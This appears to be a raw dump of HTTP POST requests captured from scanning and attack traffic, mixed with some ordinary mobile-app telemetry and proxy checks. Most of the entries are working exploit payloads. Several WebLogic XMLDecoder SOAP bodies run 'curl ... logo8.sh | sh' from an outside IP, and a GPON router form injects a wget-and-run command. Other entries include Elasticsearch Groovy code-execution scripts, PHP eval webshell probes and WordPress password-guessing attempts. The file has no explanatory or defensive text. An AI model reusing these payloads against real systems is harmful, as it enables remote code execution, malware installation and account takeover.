POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Length: 575
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  <java version="1.8" class="java.beans.XMLDecoder">
    <void id="url" class="java.net.URL">
      <string>http://217.147.169.230:4444/cve-2017-10271?target=http%3A%2F%2F64.137.220.15%3A80%2Fwls-wsat%2FCoordinatorPortType</string>
    </void>
    <void idref="url">
      <void id="stream" method = "openStream" />
    </void>
  </java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache

S/YNl4+eZAa3vwZYfNtW9HUKF9iabqp/HkKQHqRVezLH8Mx713lTJuUS7QVEUfl7jhmoEXJh0kJ1vV4WyoGrubiUcC9Xe46Or2QiMqRvn37/JoAaskcaKKmR1pwBu50F2xk9mwS6wM5VC4Dges2PAW5gwZ4ZmSeuLP2pJt7hbg/iEofouye6RpG86IS1SZ2fdrz5oyMbJVTrxT8SZ14JoTl+GPOqsGSONK2fbhtpl+TQ1PA2pJxP0NEBh5TDObVhUX5qfEtJZbh4gZtYQ1qnmT/zAqVH/3WJoM/KS8wAk5EIo6hoVCDDpD0aguTHaOvw6YQM+8JNE0nIQHe7Q23rDprrlkFNi+Vpj7Bq5MTvWXfCcplj8Ubpgw==

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

axa=die((string)(111111111*9));

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache

RaQNyd2bZKf5dqF27GDjgzlfBakX7AhD55I7CaBTw/zcuMw+1tk8XK9wWDYcA6xWfQA7j76hIWf2O1b3y3RX38v7XjDMoGYrlq1sh6/n6HPNKSHuKpjq9egVgOmEgHBJru2lJ+VMA1V7UidHAX6427ac7G4EolM6EuvOq660PEoI8hXPo/b3dxZKqM91dG/CvWqQvb7tow4Q6XS0Gu+vbU8KpqPj2WXc9keSjclmDbpq1LRI0siwTsRDlgSGZt6eTQgCJKeI9TI+vkbGZryW2kdluXVwt7sr3VXo74yU1fCoIEkW2szRPdDGOJVlh/dou91cf9l/E7q05eyav3wFGHfCMlJXSW8liyA/h1chRKh4jwQyP0JB7si09remqnmFwMS8ODoQMR2H65gur9vxWuDTcSH9UPOQaPcMkW761CHrJQ17N11Z

POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

eval=die((string)(111111111*9));

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 440
Cache-Control: no-cache

EfMMyNrMMf6wsw4EF6gn/FCezPMBKJDyhF05IVn2Zcxn/gVuDjhB1FkT6LXAVfiTVfY72qQNAzh+vIJNMg/OLb4J2EMd7gfnzF2TlBiAkwOIEbQI2PD4e7S0NmzcLojM5oLwwZBSR7JrYem5ZnXwXZKRhAwXT1T2T3h2jVWikRtVU2USqzcSmRIx+NZymE+0eiD/07oHof5252ibRALk4azz0wnsbYW3nFVET59Qj+qULoUD99D0Itchjq4w4rZ7VHtlXpK+AgqIdfRRszEv4Alc+DwDUIuJtdkk4nl9HeRqqc5hVxeXmTiummX/ouRadwejEFFNw3951jHuKqHiNXhdmPnUe7RDdcFQUJJSpKwgFzk35pgSe1YUMapaMvI7dPtegCA8AVX5CsFpdCWjYAnoG8DlCi6JnwMQskVN+PpVVzx/sX2uONQj

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
I™cÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
®}fi›Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î(π+Y›∆√«∆fl

POST http://t17.proxy-checks.com/favicon.ico HTTP/1.1
Host: t17.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

eval=die((string)(111111111*9));

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
˙PbÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 847
Host: x.x.x.x:7001



POST http://t6.proxy-checks.com/favicon.ico HTTP/1.1
Host: t6.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
⁄‰¸,Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îN´3Y›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=jamesatchue&pwd=test12

POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked

3f9
PØCv∫
w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJLZgj-: wR"5=dWHmS?\_TT>WVW_f|CB+
M?(\A1TLMZ(jOTVRce
ArW_TJdzDYS^ay
dRVYT+WVAX4|Tc
UN?M]^5,L6UYRh,D]ZH{kXjP^PJ;)AW3,Kf
TjyD^5{5DM'WVR_{k^jW^QIeyB@A9k3K@2/	M9-Z]9@H	ZqjNYXoqe^BCrD]VXn{`P^W@i~L[UFu*
rRA9GT\n(W1W[TN;)GYZd{dJLZgj_S]6zN4B_R@m-
[gM4G_VQ?~WOu&
aJLZg|D_ZXd{|CB+
M
8&O^5

2!B':B<QLMZ(jO]R[`y|L[Il}GUQ[by`^ZVLepYNHmk2B_
VJ9CU]2(ePJhq_QYb}
rTDTCMi.D[2-JQ1B\A?}]Sb*hGQ]YZ dNHmx&\_QJdpE_[Fu9Fj
V:'y(FV"K
O0;W@AuseWBCrD]VXn{`P^W@iM\[Fu*
rRA9GT\n(W1W[TN;)GYZd{dJLZgj[d}a[Mk~U^4(`BRYUJmqWOu&
bDCBhxD^QXex JDTC2%[
	2+G];
	dWAP``JLZgyDYQSexdVXYLj|MTOH4kgT_n~@Ub/4F
TN<}U[dySrDCB*TS2*V2\Mn+LPSn-J3V\P@lj@H8k|L[Ie}A@A9k3K@0jYNHmpbDCBly@^ZXf|fPVUOipM@A	us
QfU
Yh.E^Rb+LQeGV]W8{EYW[3-M|L[ZopC[W6,W4^ZYl
157
~@TW]axJfP_5YAusrRDTSHl~EZR\gy JDTC2%[

>gI\1H.jYNHmy#\_PMoqG]VZchQZSLqjNYHdxh_XPKm}T2/LhA
WIn*C^V	ue
BrD[U?pGUZn}3E
WA;ZYbyNSdLT&jNYR{k^jVVQIkE@A9k3K@8)
#,Z#A)1W@AusaQZRT;WVR[b{aVZWHkpA[WRoe
QrDTIkyYQXb/Q1A]8pF[ZZ2}KbTLMZ-jONSY1q5R;-YSS5yJWcVWP?pE\A
4
0



POST http://t8.proxy-checks.com/favicon.ico HTTP/1.1
Host: t8.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ÜôOÃÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÆ˛Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
…ùƒ4Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î,¥)Y›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 28
Cache-Control: no-cache

log=jamesatchue&pwd=1qaz2wsx

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 23
Cache-Control: no-cache

log=admin&pwd=admin2012

POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:schemas-upnp-org:service:LANHostConfigManagement:1#SetDHCPServerConfigurable
Content-Type: text/xml
Host: x.x.x.x:7547
Content-Length: 420
Connection: Keep-Alive



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 400
Cache-Control: no-cache

Qfddx9zKbMYFxfxfVusMfz9rxeE7BYXX+lTkuFkhoOqUe8wWmfNjVzh6SyXQWSC5DTAWebKUaY+RL7t4ePZlnEka5pJgM0YMo/hcp4vl01q1YpSDafWzU6ZbGk3uMzL7QdCuyuY38dsLVbVl0IwTK8toxRpsQjqKDzDNEujXdeW3VCCOdIAJxaCy5Wpa5AC/OcT4XSI1MNVNypO0OQeyY6PIHB3k6Yf89yBuoMYRREvkmrmD93LMSassJgUcl9BCd/4a+uYgMtPguD1zbOSb0kiWK5P8ucqIOQeDGIHjhFnQvP3p1aCaJ9eALo7C07aep8ye9ndqatfjx7bkZng4yPnXwYvxqHLMxsYE1+fbBcYzt15FjrQeqeosP17eJ+SzSGAiRIPFNoOGIr6v

POST http://api.vungle.com/api/v4/sessionStart HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 106

{"start":1495004165420,"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
I™cÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://hydra.alibaba.com/utdid_uc_browser/get_aid/?auth[token]=c8bc6fdf9837b2cbc7a9ed011ca1327b&type=utdid&id=V3JxZrJFQuwDAMtgV%2FWSY7o6&aid= HTTP/1.1
Content-Length: 0
Host: hydra.alibaba.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 416
Cache-Control: no-cache

FKdelYudZBZuizKcxr53yaabCB27wOoUXr2svM+EwLl2JaWKnUO7SSvqOg55GsTtPL+wKsNiR8LKO+4L+KtRPB0upENXYBaiohoWi76JYBClCSqa7Mnfcy4+BiVfJB+WCyd+/LajxNPYPkqhX3SkvlFYVpNHwXJGUyKxo2h5+eNhxdlYcWiVtszjd9kEEzwyHr+5hCoMk7AufElOGdgM8Cpr/jATfbCiXGupmnmg8XzubygXzGt/Nnmr99J+xU1jNDizvwfZeYOhawjuVzPZCym/vFv/Cgwa8WY1+MoToZpL661wljfkSU4m87FdiotLr/R490SNtpf5sabJS8ginCPBDY7wTNDLZfHJcow0FuaVe8uO+D697fFzXieSNkVVy/FELNviWT5fi5cyM3Uhu5A7MZ0UAQ==

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 24
Cache-Control: no-cache

log=jamesatchue&pwd=1616

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://www.zhangyuntao.com.cn/IVUPro/todayScore.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: www.zhangyuntao.com.cn
Connection: Keep-Alive
Content-Length: 206

act=-1&data=%7B%22appInfo%22%3A+%22Block+Puzzle+Jewel_com.differencetenderwhite.skirt_18%22%2C+%22rankId%22%3A+%22gem30%22%2C+%22score%22%3A+264%2C+%22uid%22%3A+%22ba7758bb-1039-46c5-888f-950f5ff4b1b8%22%7D

POST /_search?pretty HTTP/1.1
Accept: */*
Referer: http://x.x.x.x:9200/_search?pretty
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: x.x.x.x:9200
Content-Length: 337
Cache-Control: no-cache

{
  "size": 1,
  "query": {
    "filtered": {
      "query": {
        "match_all": {}
      }
    }
  },
  "script_fields": {
    "/etc/hosts": {
      "script": "import java.util.*;\nimport java.io.*;\nnew BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"ver\").getInputStream())).readLine();"
    }
  }
}

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
{(Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î◊b*Y›∆√«∆fl

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
`äQ<Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îêô1Y›∆√«∆fl

POST http://gj.applog.uc.cn/collect?zip=gzip&pf=android&pn=com.uc.browser.en&ve=10.9.0&vc=104&sdk_ve=3.0.10&sdk_vc=212&sf=PVBusinessUnion&app=0652abada25c&uuid=15bf5ee0f45-af8795dc3d31775f&vno=1495511961471&chk=e3b1516f HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: gj.applog.uc.cn
Transfer-Encoding: chunked
Content-Type: application/octet-stream

2ea
ã•ñÕ™#GÖ˜yäfiI%UI
^Œ"êÏf]øôê;ÃOÚˆ#;€,⁄mlpCª‡„Ëú£zˇv˘˙˝˙ÌÛÖë
†—FºìÓò∑ü± ^ˇπÕøfl>’€ßK]V\GO#Q)∫ÆÔ_˛x˚s\ JLMdjdÉÍ}AÆ:»¨ÿrΩ˝{{ªçø.‰◊œ_∆|ø¸˛Î&ø}¸xÒ}^‰ó¯¸Ù˛<≤#ÓåáyzÈ3ÕÂ0fE∑Vù†&oí–[Íı4èlLªÿÆ«ı◊fid8Ùô
dÙ
ÓÍ¿≤&r_÷^–Á?Ù√<≠œ>ßxŒ-Ù·
æ,&W[”1Ã\Ù4oD{|EÛ∏‰:ÑB蘒≈òZÊÍ›OÛËFaûßÙaOú§h∆íDÉÃÃ≈ΩŒÜaÓÛ<º1ÓIv=Œ≥(Õ…Ö`éô√?˜yµT°r`™M_mº†O¯GÛ.È0œÃdö#Ô#Á˛in…†óâ)ÛX.tö'oTûÃóvó.âÉß
 ˝≥*¥à’\+ïÛ˙îªTw>>Ø^∞KÖ"M@ÚÍ—ál“¥âˇüÊÒç“ûlz¢˙Zà—œÖ(ÚUjüf∆
◊8•Ù
OòπÏIÛW‰⁄2¥&DÀÓ@ñYÃçPœÔã‡	qpß„ÛínyÕ’†ß§1/ãf –)ó\M4͇û»W
KÁ°^≠ê∆y◊ò≈Ê0â…Õ⁄FS‰‰égybçF9£>”?•⁄\”;8ñò◊)Ù±˛»ª2vw>=Ø;œΩw‰√<πU1≠˚=¨}8†%]‡5M—:+ÀÈ~fz‰+FvºzSÆ≥Ñkf	û˛X]qfl∞9uaò∫ı”˚ù˚=ÒŒ«ı—àWËaP*«˝'á©õ˜3wúe’‹xùÊ·{æ"ÔO¯'4∏Á8ø ´ƒºjÏãÏ£Æ>C∑xòcy“qˇîw”X†eÖ(≈S¨˚ºà-≤éÊν^‚Ú@
0



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 372
Cache-Control: no-cache

E6UNxY+eYMUkRpJyVjrueKqEvgRnLyJ9//0s2OPMDko9kOSozHtYJ2dSnI/l/K+CEbsLlUOjazMQbWbLJYcDNN77VUdKbjZ6iXdOdTs2dCEDGeQRKeYUT7bahVEFhAn4Hlp9IEDNH5ZfYCLPF5FFdIJkDsxyFl8HV+hiPDE2qcA3NIvA+mcrfZ8tc4cjAtdEtKdLiNrZ4vLIgSccQsm5Ar3KdkGTNZZ4WI+YUuDIru961J3vOhopjX18IVv5iaJNnKafGjVg+wzjD7eCLtjqyJMZjjgNCDkbGdp3004bxULtsWKEG+5PyRf1a9TNbqSQw5FPaeML+3cii3TH6TmN7CFw1YGG5xuNmzcsw5HIAB0CDMKIP/vb

POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

m=die('Hello, Peppa!'.(string)(111111111*9))

POST http://check.proxyradar.com/azenv.php?auth=149605644571&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die((string)(111111111*9));

POST /sysaid/rdslogs?rdsName=ai1eJl7OhMXkSXi HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/xml
Content-Length: 39

